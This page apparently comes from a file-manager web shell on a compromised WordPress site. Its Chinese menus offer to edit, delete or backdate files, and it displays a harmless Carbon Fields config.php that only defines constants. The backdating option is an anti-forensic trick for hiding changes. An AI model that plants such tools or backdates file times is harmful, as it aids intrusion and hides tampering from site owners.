文件操作 - config.php
返回文件管理
返回主菜单
删除本文件
文件: /var/www/ltlcompare.com/wp-content/themes/ltl-compare/plugins/htmlburger/carbon-fields/config.php
编辑文件内容
<?php namespace Carbon_Fields; # Define version constant if ( ! defined( __NAMESPACE__ . '\VERSION' ) ) { define( __NAMESPACE__ . '\VERSION', '3.6.9' ); } # Define root directory if ( ! defined( __NAMESPACE__ . '\DIR' ) ) { define( __NAMESPACE__ . '\DIR', __DIR__ ); } # Define root URL if ( ! defined( __NAMESPACE__ . '\URL' ) ) { define( __NAMESPACE__ . '\URL', Carbon_Fields::directory_to_url( \Carbon_Fields\DIR ) ); } # Define whether to compact input fields into a single one to avoid hitting max_input_vars if ( ! defined( __NAMESPACE__ . '\COMPACT_INPUT' ) ) { define( __NAMESPACE__ . '\COMPACT_INPUT', true ); } # Define whether to compact input fields into a single one to avoid hitting max_input_vars if ( ! defined( __NAMESPACE__ . '\COMPACT_INPUT_KEY' ) ) { define( __NAMESPACE__ . '\COMPACT_INPUT_KEY', 'carbon_fields_compact_input' ); }
修改文件时间
将文件时间修改为当前时间的前一年
删除文件